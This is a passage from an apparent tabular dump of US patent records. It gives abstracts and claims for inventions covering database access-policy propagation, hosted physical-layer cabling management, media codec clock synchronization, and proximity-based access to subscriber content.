program code configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy; and
program code configured to propagate the new access policy, in real-time, to one or more other database servers in the set for instantiation on the one or more other database servers. 9. The apparatus as described in claim 8 wherein the program code configured to analyze the response against the access policy executes an extrusion rule. 10. The apparatus as described in claim 9 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 11. The apparatus as described in claim 8 wherein the computer program instructions further include program code to issue a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 12. The apparatus as described in claim 8 wherein the new access policy includes information that identifies the client to the one or more other database servers. 13. The apparatus as described in claim 8 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the program code to analyze is executed at a collector, and the program code to generate and propagate the new access policy is executed at a central manager. 14. The apparatus as described in claim 8 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 15. A computer program product comprising computer program instructions on non-transitory computer-readable media, the computer program instructions executed by a processor in association with a database access control system, the database access control system being associated with a set of database servers that share an access policy, the computer program instructions comprising:
program code configured to receive from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; program code configured to analyze the response against the access policy; program code configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy; and program code configured to propagate the new access policy, in real-time, to one or more other database servers in the set for instantiation on the one or more other database servers. 16. The computer program product as described in claim 15 wherein the program code configured to analyze the response against the access policy executes an extrusion rule. 17. The computer program product as described in claim 16 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 18. The computer program product as described in claim 15 wherein the computer program instructions further include program code to issue a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 19. The computer program product as described in claim 15 wherein the new access policy includes information that identifies the client to the one or more other database servers. 20. The computer program product as described in claim 15 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the program code to analyze is executed at a collector, and the program code to generate and propagate the new access policy is executed at a central manager. 21. The computer program product as described in claim 15 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 22. A database access control system, comprising:
a tap that executes in hardware in association with a database server, the database server being one of a set of database servers that share an access policy; a collector that executes in hardware in association with or more taps, the collector being configured to receive from a tap at a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers, and to analyze the response against the access policy; and a manager that executes in hardware in association with one or more collectors, the manager being configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy, and to propagate the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers; wherein the access policy violation-to-new access policy generation and propagation occurs in real-time to immunize the one or more other database servers in the set against one or more additional database access requests originated by the client. | A mechanism that dynamically creates a new access policy for a set of database servers when a policy violation has been identified in a database access response issued by any database in the set. The new access policy is then propagated in real-time and instantiated across the set of database servers so as to inoculate the other database servers and pre-empt any new compromise of information based on the intruder's actions that were found to have produced the policy violation in the first instance. Thus, the approach uses a response policy violation at one database server of a set to trigger generation of a new request access policy that is then instantiated across one or more other database servers. This response policy violation-to-request access policy instantiation occurs in substantially real-time so that the intruder cannot use a prior successful access request to obtain information from other databases using a similar strategy.1. A method operative in a database access control system, the database access control system being associated with a set of database servers that share an access policy, comprising:
receiving from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; analyzing the response against the access policy; upon determining that the response includes a violation of the access policy, automatically generating a new access policy; and real-time propagating the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers. 2. The method as described in claim 1 wherein analyzing the response against the access policy executes an extrusion rule. 3. The method as described in claim 2 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 4. The method as described in claim 1 further including issuing a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 5. The method as described in claim 1 wherein the new access policy includes information that identifies the client to the one or more other database servers. 6. The method as described in claim 1 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the analyzing occurs at a collector, and the generating and propagating occurs at a central manager. 7. The method as described in claim 1 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 8. An apparatus, comprising:
a processor; computer memory holding computer program instructions operative in association with a database access control system, the database access control system being associated with a set of database servers that share an access policy, the computer program instructions comprising:
program code configured to receive from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers;
program code configured to analyze the response against the access policy;
program code configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy; and
program code configured to propagate the new access policy, in real-time, to one or more other database servers in the set for instantiation on the one or more other database servers. 9. The apparatus as described in claim 8 wherein the program code configured to analyze the response against the access policy executes an extrusion rule. 10. The apparatus as described in claim 9 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 11. The apparatus as described in claim 8 wherein the computer program instructions further include program code to issue a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 12. The apparatus as described in claim 8 wherein the new access policy includes information that identifies the client to the one or more other database servers. 13. The apparatus as described in claim 8 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the program code to analyze is executed at a collector, and the program code to generate and propagate the new access policy is executed at a central manager. 14. The apparatus as described in claim 8 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 15. A computer program product comprising computer program instructions on non-transitory computer-readable media, the computer program instructions executed by a processor in association with a database access control system, the database access control system being associated with a set of database servers that share an access policy, the computer program instructions comprising:
program code configured to receive from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; program code configured to analyze the response against the access policy; program code configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy; and program code configured to propagate the new access policy, in real-time, to one or more other database servers in the set for instantiation on the one or more other database servers. 16. The computer program product as described in claim 15 wherein the program code configured to analyze the response against the access policy executes an extrusion rule. 17. The computer program product as described in claim 16 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 18. The computer program product as described in claim 15 wherein the computer program instructions further include program code to issue a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 19. The computer program product as described in claim 15 wherein the new access policy includes information that identifies the client to the one or more other database servers. 20. The computer program product as described in claim 15 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the program code to analyze is executed at a collector, and the program code to generate and propagate the new access policy is executed at a central manager. 21. The computer program product as described in claim 15 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 22. A database access control system, comprising:
a tap that executes in hardware in association with a database server, the database server being one of a set of database servers that share an access policy; a collector that executes in hardware in association with or more taps, the collector being configured to receive from a tap at a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers, and to analyze the response against the access policy; and a manager that executes in hardware in association with one or more collectors, the manager being configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy, and to propagate the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers; wherein the access policy violation-to-new access policy generation and propagation occurs in real-time to immunize the one or more other database servers in the set against one or more additional database access requests originated by the client. | 2,400 |
9,122 | 9,122 | 16,141,784 | 2,411 | One embodiment is directed to a heterogeneous physical layer management system comprising first devices, each comprising first physical layer information acquisition technology to obtain physical layer information about cabling attached to the first devices. The system further comprises second devices, each comprising second physical layer information acquisition technology to obtain physical layer information about cabling attached to the second devices, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. The system further comprises a common management application communicatively coupled to the first devices and the second devices, wherein the common management application is configured to aggregate physical layer information from the first devices and the second devices. Another embodiment is directed to providing a physical layer management application as a service hosted by a third party. Other embodiments are disclosed. | 1. A method comprising:
acquiring, using one or more physical layer information acquisition technologies, physical layer information related to cabling attached to managed devices of a plurality of networks, each of the networks operated by a different enterprise; and aggregating, with the one or more server computers operated by a third party, the physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party as a hosted service. 2. The method of claim 1, wherein aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party as a hosted service comprises:
maintaining, by the third party, a respective one or more virtual server instances for each of the plurality of networks; and for each of the plurality of networks, aggregating physical layer information related to cabling attached to managed devices of that network using the one or more virtual server instances associated with that network. 3. The method of claim 1, wherein aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party comprises load balancing, across a plurality of server resources, processing associated with aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks. 4. The method of claim 1, further comprising:
running, for each of the plurality of networks, a respective one or more local agents within the network that communicates physical layer information acquired for the network to the third party. 5. The method of claim 4, further comprising, for each of the plurality of networks, using a respective one or more HTTP sessions that are initiated by the respective local agents running within the network. 6. The method of claim 1, wherein, for at least one network, the one or more physical layer information acquisition technologies include at least one of EEPROM-based technology, RFID technology, ninth wire technology, or inference-based technology. 7. The method of claim 1, further comprising, for at least one network, acquiring physical layer information related to unmanaged devices. 8. The method of claim 1, wherein the one or more physical layer information acquisition technologies includes a first physical layer information acquisition technology and a second physical layer information acquisition technology, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. 9. A server system comprising:
one or more server computers operated by a third party; wherein the one or more server computers are configured to aggregate physical layer information related to cabling attached to managed devices of each of a plurality of networks as a hosted service, wherein each of the plurality of networks is operated by a different enterprise, wherein the physical layer information is acquired using one or more physical layer information acquisition technologies. 10. The server system of claim 9, wherein the one or more server computers are further configured to aggregate physical layer information about unmanaged devices. 11. The server system of claim 9, wherein the one or more server computers are configured to aggregate physical layer information obtained by managed devices in the plurality of networks. 12. The server system of claim 9, wherein the one or more server computers are configured to:
maintain a respective one or more virtual server instances for each of the plurality of networks; and for each respective network of the plurality of networks, aggregate physical layer information for the respective network using the one or more virtual server instances associated with the respective network. 13. The server system of claim 9, wherein the one or more server computers are configured to load balance, across a plurality of server resources, processing associated with aggregating physical layer information about each of the plurality of networks. 14. The server system of claim 9, wherein the one or more server computers are configured to run, for each of the plurality of networks, a respective one or more local agents within the network that communicates physical layer information acquired for the network to the third party. 15. The server system of claim 14, wherein the respective one or more local agents within the network are configured to implement a gateway between the managed devices of the network and a hosted management application deployed on the one or more server computers. 16. The server system of claim 15, wherein the gateway is configured to appear and function as a locally deployed management application in the network to the managed devices of the network. 17. The server system of claim 14, wherein the respective one or more local agents within the network are configured to implement a gateway between other entities and a hosted management application deployed on the one or more server computers. 18. The server system of claim 14, wherein the one or more server computers are configured to, for each of the plurality of networks, use a respective one or more HTTP sessions that are initiated by the respective local agents running within the network. 19. The server system of claim 9, wherein the physical layer information about at least one network of the plurality of networks is acquired using one or more of an EEPROM-based technology, a RFID technology, ninth wire technology, and inference-based technology. 20. The server system of claim 9, wherein the one or more physical layer information acquisition technologies includes a first physical layer information acquisition technology and a second physical layer information acquisition technology, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. | One embodiment is directed to a heterogeneous physical layer management system comprising first devices, each comprising first physical layer information acquisition technology to obtain physical layer information about cabling attached to the first devices. The system further comprises second devices, each comprising second physical layer information acquisition technology to obtain physical layer information about cabling attached to the second devices, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. The system further comprises a common management application communicatively coupled to the first devices and the second devices, wherein the common management application is configured to aggregate physical layer information from the first devices and the second devices. Another embodiment is directed to providing a physical layer management application as a service hosted by a third party. Other embodiments are disclosed.1. A method comprising:
acquiring, using one or more physical layer information acquisition technologies, physical layer information related to cabling attached to managed devices of a plurality of networks, each of the networks operated by a different enterprise; and aggregating, with the one or more server computers operated by a third party, the physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party as a hosted service. 2. The method of claim 1, wherein aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party as a hosted service comprises:
maintaining, by the third party, a respective one or more virtual server instances for each of the plurality of networks; and for each of the plurality of networks, aggregating physical layer information related to cabling attached to managed devices of that network using the one or more virtual server instances associated with that network. 3. The method of claim 1, wherein aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks by the third party comprises load balancing, across a plurality of server resources, processing associated with aggregating physical layer information related to cabling attached to managed devices of each of the plurality of networks. 4. The method of claim 1, further comprising:
running, for each of the plurality of networks, a respective one or more local agents within the network that communicates physical layer information acquired for the network to the third party. 5. The method of claim 4, further comprising, for each of the plurality of networks, using a respective one or more HTTP sessions that are initiated by the respective local agents running within the network. 6. The method of claim 1, wherein, for at least one network, the one or more physical layer information acquisition technologies include at least one of EEPROM-based technology, RFID technology, ninth wire technology, or inference-based technology. 7. The method of claim 1, further comprising, for at least one network, acquiring physical layer information related to unmanaged devices. 8. The method of claim 1, wherein the one or more physical layer information acquisition technologies includes a first physical layer information acquisition technology and a second physical layer information acquisition technology, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. 9. A server system comprising:
one or more server computers operated by a third party; wherein the one or more server computers are configured to aggregate physical layer information related to cabling attached to managed devices of each of a plurality of networks as a hosted service, wherein each of the plurality of networks is operated by a different enterprise, wherein the physical layer information is acquired using one or more physical layer information acquisition technologies. 10. The server system of claim 9, wherein the one or more server computers are further configured to aggregate physical layer information about unmanaged devices. 11. The server system of claim 9, wherein the one or more server computers are configured to aggregate physical layer information obtained by managed devices in the plurality of networks. 12. The server system of claim 9, wherein the one or more server computers are configured to:
maintain a respective one or more virtual server instances for each of the plurality of networks; and for each respective network of the plurality of networks, aggregate physical layer information for the respective network using the one or more virtual server instances associated with the respective network. 13. The server system of claim 9, wherein the one or more server computers are configured to load balance, across a plurality of server resources, processing associated with aggregating physical layer information about each of the plurality of networks. 14. The server system of claim 9, wherein the one or more server computers are configured to run, for each of the plurality of networks, a respective one or more local agents within the network that communicates physical layer information acquired for the network to the third party. 15. The server system of claim 14, wherein the respective one or more local agents within the network are configured to implement a gateway between the managed devices of the network and a hosted management application deployed on the one or more server computers. 16. The server system of claim 15, wherein the gateway is configured to appear and function as a locally deployed management application in the network to the managed devices of the network. 17. The server system of claim 14, wherein the respective one or more local agents within the network are configured to implement a gateway between other entities and a hosted management application deployed on the one or more server computers. 18. The server system of claim 14, wherein the one or more server computers are configured to, for each of the plurality of networks, use a respective one or more HTTP sessions that are initiated by the respective local agents running within the network. 19. The server system of claim 9, wherein the physical layer information about at least one network of the plurality of networks is acquired using one or more of an EEPROM-based technology, a RFID technology, ninth wire technology, and inference-based technology. 20. The server system of claim 9, wherein the one or more physical layer information acquisition technologies includes a first physical layer information acquisition technology and a second physical layer information acquisition technology, wherein the second physical layer information acquisition technology differs from the first physical layer information acquisition technology. | 2,400 |
9,123 | 9,123 | 15,284,094 | 2,477 | Embodiments disclosed herein provide systems, methods, and computer readable media for synchronizing a media codec between network elements of a media communication session. In a particular embodiment, a method provides designating a first network element to be a static-clock network element during the media communication session and designating at least a second network element to be a dynamic-clock network element during the media communication session. The method further provides determining that a difference in clock speed exists between a second clock speed for the media codec at the second network element and a first clock speed for the media codec at the first network element. Also, the method provides adjusting the second clock speed to account for the difference in clock speed. | 1. A method for synchronizing a media codec between network elements of a media communication session, the method comprising:
designating a first network element to be a static-clock network element during the media communication session; designating at least a second network element to be a dynamic-clock network element during the media communication session; determining that a difference in clock speed exists between a second clock speed for the media codec at the second network element and a first clock speed for the media codec at the first network element; and adjusting the second clock speed to account for the difference in clock speed. 2. The method of claim 1, wherein determining that the difference in clock speed exists comprises:
at the second network element, receiving a plurality of data packets for the media communication session from the first network element; calculating an average frequency in which the plurality of data packets is received; and determining that a difference in frequency exists between the average frequency and a frequency of the first clock speed. 3. The method of claim 2, wherein calculating the average frequency comprises:
using the second clock speed to maintain a counter to calculate an arrival rate of the plurality of data packets. 4. The method of claim 2, wherein adjusting the second clock speed comprises:
increasing the second clock speed when the average frequency is determined to be lower than the frequency of the first clock speed; and decreasing the second clock speed when the average frequency is determined to be higher than the frequency of the first clock speed. 5. The method of claim 2, wherein the plurality of data packets is received in the Real-time Transport Protocol (RTP). 6. The method of claim 1, wherein designating the first network element to be the static-clock network element comprises:
determining that the first clock speed comprises a most accurate clock speed relative to clock speeds of other network elements on the media communication session. 7. The method of claim 6, further comprising:
at a time after designating the first network element to be the static-clock network element, determining that the first clock speed no longer comprises the most accurate clock speed; designating the first network element as a dynamic-clock network element; and designating another network element now having the most accurate clock speed to be the static-clock network element. 8. The method of claim 1, wherein the first network element comprises a first endpoint to the media communication session and the second network element comprises a second endpoint to the media communication session. 9. The method of claim 1, further comprising:
at the second network element, receiving a clock speed indication from the first network element indicating the first clock speed. 10. The method of claim 1, wherein the first clock speed comprises a default clock speed for the media codec. 11. A network element to synchronize a media codec between network elements of a media communication session, the network element comprising:
one or more computer readable storage media; a processing system operatively coupled with the one or more computer readable storage media; and program instructions stored on the one or more computer readable storage media that, when read and executed by the processing system, direct the processing system to:
designate a first network element to be a static-clock network element during the media communication session;
designate at least a second network element to be a dynamic-clock network element during the media communication session;
determine that a difference in clock speed exists between a second clock speed for the media codec at the second network element and a first clock speed for the media codec at the first network element; and
adjust the second clock speed to account for the difference in clock speed. 12. The network element of claim 11, wherein to designate the first network element to be the static-clock network element the program instructions direct the processing system to:
determine that the first clock speed comprises a most accurate clock speed relative to clock speeds of other network elements on the media communication session. 13. The network element of claim 12, wherein the program instructions further direct the processing system to:
at a time after designating the first network element to be the static-clock network element, determine that the first clock speed no longer comprises the most accurate clock speed; designate the first network element as a dynamic-clock network element; and designate another network element now having the most accurate clock speed to be the static-clock network element. 14. The network element of claim 11, wherein the first network element comprises a first endpoint to the media communication session and the second network element comprises a second endpoint to the media communication session. 15. The network element of claim 11, wherein the program instructions further direct the processing system to:
provide the second network element with a clock speed indication from the first network element indicating the first clock speed. 16. A network element to synchronize a media codec between network elements of a media communication session, the network element comprising:
one or more computer readable storage media; a processing system operatively coupled with the one or more computer readable storage media; and program instructions stored on the one or more computer readable storage media that, when read and executed by the processing system, direct the processing system to:
designate the network element to be a dynamic-clock network element during the media communication session, wherein a first network element is designated to be a static-clock network element during the media communication session;
determine that a difference in clock speed exists between a second clock speed for the media codec at the network element and a first clock speed for the media codec at the first network element; and
adjust the second clock speed to account for the difference in clock speed. 17. The network element of claim 16, wherein to determine that the difference in clock speed exists, the program instructions direct the processing system to:
receive a plurality of data packets for the media communication session from the first network element; calculate an average frequency in which the plurality of data packets is received; and determine that a difference in frequency exists between the average frequency and a frequency of the first clock speed. 18. The network element of claim 17, wherein to calculate the average frequency, the program instructions direct the processing system to:
use the second clock speed to maintain a counter to calculate an arrival rate of the plurality of data packets. 19. The network element of claim 17, wherein to adjust the second clock speed, the program instructions direct the processing system to:
increase the second clock speed when the average frequency is determined to be lower than the frequency of the first clock speed; and decrease the second clock speed when the average frequency is determined to be higher than the frequency of the first clock speed. 20. The network element of claim 17, wherein the plurality of data packets is received in the Real-time Transport Protocol (RTP). | Embodiments disclosed herein provide systems, methods, and computer readable media for synchronizing a media codec between network elements of a media communication session. In a particular embodiment, a method provides designating a first network element to be a static-clock network element during the media communication session and designating at least a second network element to be a dynamic-clock network element during the media communication session. The method further provides determining that a difference in clock speed exists between a second clock speed for the media codec at the second network element and a first clock speed for the media codec at the first network element. Also, the method provides adjusting the second clock speed to account for the difference in clock speed.1. A method for synchronizing a media codec between network elements of a media communication session, the method comprising:
designating a first network element to be a static-clock network element during the media communication session; designating at least a second network element to be a dynamic-clock network element during the media communication session; determining that a difference in clock speed exists between a second clock speed for the media codec at the second network element and a first clock speed for the media codec at the first network element; and adjusting the second clock speed to account for the difference in clock speed. 2. The method of claim 1, wherein determining that the difference in clock speed exists comprises:
at the second network element, receiving a plurality of data packets for the media communication session from the first network element; calculating an average frequency in which the plurality of data packets is received; and determining that a difference in frequency exists between the average frequency and a frequency of the first clock speed. 3. The method of claim 2, wherein calculating the average frequency comprises:
using the second clock speed to maintain a counter to calculate an arrival rate of the plurality of data packets. 4. The method of claim 2, wherein adjusting the second clock speed comprises:
increasing the second clock speed when the average frequency is determined to be lower than the frequency of the first clock speed; and decreasing the second clock speed when the average frequency is determined to be higher than the frequency of the first clock speed. 5. The method of claim 2, wherein the plurality of data packets is received in the Real-time Transport Protocol (RTP). 6. The method of claim 1, wherein designating the first network element to be the static-clock network element comprises:
determining that the first clock speed comprises a most accurate clock speed relative to clock speeds of other network elements on the media communication session. 7. The method of claim 6, further comprising:
at a time after designating the first network element to be the static-clock network element, determining that the first clock speed no longer comprises the most accurate clock speed; designating the first network element as a dynamic-clock network element; and designating another network element now having the most accurate clock speed to be the static-clock network element. 8. The method of claim 1, wherein the first network element comprises a first endpoint to the media communication session and the second network element comprises a second endpoint to the media communication session. 9. The method of claim 1, further comprising:
at the second network element, receiving a clock speed indication from the first network element indicating the first clock speed. 10. The method of claim 1, wherein the first clock speed comprises a default clock speed for the media codec. 11. A network element to synchronize a media codec between network elements of a media communication session, the network element comprising:
one or more computer readable storage media; a processing system operatively coupled with the one or more computer readable storage media; and program instructions stored on the one or more computer readable storage media that, when read and executed by the processing system, direct the processing system to:
designate a first network element to be a static-clock network element during the media communication session;
designate at least a second network element to be a dynamic-clock network element during the media communication session;
determine that a difference in clock speed exists between a second clock speed for the media codec at the second network element and a first clock speed for the media codec at the first network element; and
adjust the second clock speed to account for the difference in clock speed. 12. The network element of claim 11, wherein to designate the first network element to be the static-clock network element the program instructions direct the processing system to:
determine that the first clock speed comprises a most accurate clock speed relative to clock speeds of other network elements on the media communication session. 13. The network element of claim 12, wherein the program instructions further direct the processing system to:
at a time after designating the first network element to be the static-clock network element, determine that the first clock speed no longer comprises the most accurate clock speed; designate the first network element as a dynamic-clock network element; and designate another network element now having the most accurate clock speed to be the static-clock network element. 14. The network element of claim 11, wherein the first network element comprises a first endpoint to the media communication session and the second network element comprises a second endpoint to the media communication session. 15. The network element of claim 11, wherein the program instructions further direct the processing system to:
provide the second network element with a clock speed indication from the first network element indicating the first clock speed. 16. A network element to synchronize a media codec between network elements of a media communication session, the network element comprising:
one or more computer readable storage media; a processing system operatively coupled with the one or more computer readable storage media; and program instructions stored on the one or more computer readable storage media that, when read and executed by the processing system, direct the processing system to:
designate the network element to be a dynamic-clock network element during the media communication session, wherein a first network element is designated to be a static-clock network element during the media communication session;
determine that a difference in clock speed exists between a second clock speed for the media codec at the network element and a first clock speed for the media codec at the first network element; and
adjust the second clock speed to account for the difference in clock speed. 17. The network element of claim 16, wherein to determine that the difference in clock speed exists, the program instructions direct the processing system to:
receive a plurality of data packets for the media communication session from the first network element; calculate an average frequency in which the plurality of data packets is received; and determine that a difference in frequency exists between the average frequency and a frequency of the first clock speed. 18. The network element of claim 17, wherein to calculate the average frequency, the program instructions direct the processing system to:
use the second clock speed to maintain a counter to calculate an arrival rate of the plurality of data packets. 19. The network element of claim 17, wherein to adjust the second clock speed, the program instructions direct the processing system to:
increase the second clock speed when the average frequency is determined to be lower than the frequency of the first clock speed; and decrease the second clock speed when the average frequency is determined to be higher than the frequency of the first clock speed. 20. The network element of claim 17, wherein the plurality of data packets is received in the Real-time Transport Protocol (RTP). | 2,400 |
9,124 | 9,124 | 16,233,389 | 2,424 | A system is provided for allowing temporary access to subscriber content through a network appliance. The system includes a server application residing on a platform server, an appliance application residing on the network appliance, and a mobile application residing on a mobile device. The server application determines the location of each of the network appliance and the mobile device. If they are within a set distance of one another, the server application allows for the temporary access to, and display of a subscriber's content on the network appliance. The server appliance can transmit a code to the network appliance, which the user then inputs into the mobile device. | 1. A system for allowing the display of subscriber content, comprising:
a server application residing on a platform server; an appliance application residing on a network-enabled viewing appliance; and a mobile device application residing on a mobile device, wherein the server application determines a location of each of the network-enabled viewing appliance and the mobile device, and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are within a set distance of each other, the server application allows for the display of subscriber content on the network-enabled viewing appliance, and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are not within the set distance of each other, the server application does not allow for the display of subscriber content on the network-enabled viewing appliance. 2. The system of claim 1, wherein the network-enabled viewing appliance and the mobile device each have location services thereon, and wherein the server application determines a distance between the network-enabled viewing appliance and the mobile device by comparing data transmitted to the server application by the location services. 3. The system of claim 2, wherein, before the server application determines the location of each of the network-enabled viewing appliance and the mobile device, the server application transmits a first code to the appliance application. 4. The system of claim 3, wherein the first code is of a type selected from the group consisting of an alphanumeric code, an audible code, an image, and any combinations thereof. 5. The system of claim 3, wherein the server application compares a second code transmitted to the server application by the mobile device application to the first code that the server application transmits to the appliance application. 6. The system of claim 5, wherein, if the server application determines that the first code matches the second code, the server application then determines the location of each of the network-enabled viewing appliance and the mobile device. 7. The system of claim 1, wherein the server application allows for the display of subscriber content on the network-enabled viewing appliance by transmitting data relating to the subscriber content to the network-enabled viewing appliance, and for storing the data on the network-enabled viewing appliance. 8. The system of claim 1, wherein the set distance is between zero and one hundred feet. 9. The system of claim 1, wherein the set distance is between zero and twenty feet. 10. The system of claim 1, wherein the server application queries the appliance application and the mobile device application periodically to determine whether the network-enabled viewing appliance and the mobile device are within the set distance. 11. The system of claim 1, wherein the server application queries the appliance application and the mobile device application once every five minutes. 12. The system of claim 1, wherein, when the server application allows for the display of subscriber content on the network-enabled viewing appliance, the server application either downloads content viewing applications onto the network-enabled viewing appliance, or places prompts on the network-enabled viewing appliance that would allow for download of the content viewing applications. 13. The system of claim 1, wherein, when the server application allows for the display of subscriber content on the network-enabled viewing appliance, the server application either downloads content viewing applications onto the network-enabled viewing appliance, or places prompts on the network-enabled viewing appliance that would allow for download of the content viewing applications. 14. A method for allowing the display of subscriber content on a network-enabled viewing appliance that is part of a system, wherein the system comprises:
a server application residing on a platform server; an appliance application residing on the network-enabled viewing appliance; and a mobile device application residing on a mobile device, the method comprising the steps of: transmitting a first code from the server application to the appliance application, for display on the network-enabled viewing appliance; transmitting a second code from the mobile device application to the server application; comparing the first code to the second code on the server application; if the first code matches the second code, determining a location of each of the network-enabled viewing appliance and the mobile device via location services on each; determining whether the network-enabled viewing appliance and the mobile device are within a set distance of each other; wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are within the set distance of each other, allowing for the display of subscriber content on the network-enabled viewing appliance; and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are not within the set distance of each other, not allowing for the display of subscriber content on the network-enabled viewing appliance. 15. The method of claim 14, wherein the first code is of the type selected from the group consisting of an alphanumeric code, an audible code, an image, and any combinations thereof. 16. The method of claim 14, wherein the allowing for the display of subscriber content on the network-enabled viewing appliance step comprises transmitting data relating to the subscriber content to the network-enabled viewing appliance, and storing the data on the network-enabled viewing appliance. 17. The method of claim 14, wherein the set distance is between zero and one hundred feet. 18. The method of claim 14, wherein the set distance is between zero and twenty feet. 19. The method of claim 14, further comprising the step of querying the appliance application and the mobile device application periodically to determine whether the network-enabled viewing appliance and the mobile device are within the set distance. 20. The system of claim 19, wherein the querying step comprises querying the appliance application and the mobile device application once every five minutes. | A system is provided for allowing temporary access to subscriber content through a network appliance. The system includes a server application residing on a platform server, an appliance application residing on the network appliance, and a mobile application residing on a mobile device. The server application determines the location of each of the network appliance and the mobile device. If they are within a set distance of one another, the server application allows for the temporary access to, and display of a subscriber's content on the network appliance. The server appliance can transmit a code to the network appliance, which the user then inputs into the mobile device.1. A system for allowing the display of subscriber content, comprising:
a server application residing on a platform server; an appliance application residing on a network-enabled viewing appliance; and a mobile device application residing on a mobile device, wherein the server application determines a location of each of the network-enabled viewing appliance and the mobile device, and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are within a set distance of each other, the server application allows for the display of subscriber content on the network-enabled viewing appliance, and wherein, when the server application determines that the network-enabled viewing appliance and the mobile device are not within the set distance of each other, the server application does not allow for the display of subscriber content on the network-enabled viewing appliance. 2. The system of claim 1, wherein the network-enabled viewing appliance and the mobile device each have location services thereon, and wherein the server application determines a distance between the network-enabled viewing appliance and the mobile device by comparing data transmitted to the server application by the location services. 3. The system of claim 2, wherein, before the server application determines the location of each of the network-enabled viewing appliance and the mobile device, the server application transmits a first code to the appliance application. 4. The system of claim 3, wherein the first code is of a type selected from the group consisting of an alphanumeric code, an audible code, an image, and any combinations thereof. 5. The system of claim 3, wherein the server application compares a second code transmitted to the server application by the mobile device application to the first code that the server application transmits to the appliance application. 6. The system of claim 5, wherein, if the server application determines that the first code matches the second code, the server application then determines the location of each of the network-enabled viewing appliance and the mobile device. 7. The system of claim 1, wherein the server application allows for the display of subscriber content on the network-enabled viewing appliance by transmitting data relating to the subscriber content to the network-enabled viewing appliance, and for storing the data on the network-enabled viewing appliance. 8. The system of claim 1, wherein the set distance is between zero and one hundred feet. 9. The system of claim 1, wherein the set distance is between zero and twenty feet. 10. The system of claim 1, wherein the server application queries the appliance application and the mobile device application periodically to determine whether the network-enabled viewing appliance and the mobile device are within the set distance. 11. The system of claim 1, wherein the server application queries the appliance application and the mobile device application once every five minutes. 12. The system of claim 1, wherein, when the server application allows for the display of subscriber content on the network-enabled viewing appliance, the server application either downloads content viewing applications onto the network-enabled viewing appliance, or places prompts on the network-enabled viewing appliance that would allow for download of the content viewing applications. 13. The system of claim 1, wherein, when the server application allows for the display of subscriber content on the network-enabled viewing appliance, the server application either downloads content viewing applications onto the network-enabled viewing appliance, or places prompts on the network-enabled viewing appliance that would allow for download of the content viewing applications. 14. A method for allowing the display of subscriber content on a network-enabled viewing appliance that is part of a system, wherein the system comprises:
